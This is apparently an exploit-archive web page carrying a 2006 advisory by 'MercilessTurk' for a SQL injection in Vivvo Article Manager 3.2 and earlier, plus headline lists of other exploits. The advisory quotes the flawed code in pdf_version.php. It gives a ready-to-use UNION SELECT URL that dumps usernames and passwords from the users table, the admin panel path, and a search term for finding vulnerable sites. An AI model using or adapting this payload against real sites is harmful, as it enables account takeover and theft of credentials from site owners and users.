exploits , vulnerabilities , articles , Vivvo Article Manager <= 3.2 (id) Remote SQL Injection Vulnerability

2007-06-03 Particle Gallery <= 1.0.1 Remote SQL Injection Exploit
2007-04-15 Mambo/Joomla Component Article 1.1 Remote File Inclusion Vulnerability
2007-04-02 Xoops Module XFsection <= 1.07 (articleid) BLIND SQL Injection Exploit
2007-04-02 Xoops Module WF-Section <= 1.01 (articleid) SQL Injection Exploit
2007-03-29 Xoops module Articles <= 1.03 (index.php cat_id) SQL Injection Exploit
2007-03-27 Xoops module Articles <= 1.02 (print.php id) SQL Injection Exploit

2006-09-09

Vivvo Article Manager <= 3.2 (id) Remote SQL Injection Vulnerability

Rated as : Moderate Risk

############################################################
#MercilessTurk info@kahramanhost.com
############################################################
#App Name: phpWordPress (Vivvo Article Manager)
#App Author: vivvo.net
#App Version: <=3.2
############################################################
#Vulnerable Code in pdf_version.php :
#line 19: $aid=secure_sql($_GET['id']);
#line 20: $query="SELECT * from tblArticles where id=$aid";
#secure_sql function doesn't block all sql injection attacks.
############################################################
#You will need a pdf reader.
#SQL Injection String:
#http://[target]/[path]/pdf_version.php?id=-1%20UNION%20SELECT%201,2,3,password,5,6,username,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20FROM%20tblUsers%20where%20userid=[target_user_id]
############################################################
#Admin Panel:http://[target]/[path]/admin
############################################################
#For google searching:Vivvo Article Manager
############################################################
#Greetz: sanaldarbe.com members.
############################################################


securitydot.net - 2006-09-09

Exploits - newest 10 RSS | More

2007-06-15 56170 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 33444 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 41594 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28790 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19320 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16341 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 18976 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16220 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33045 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 16859 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit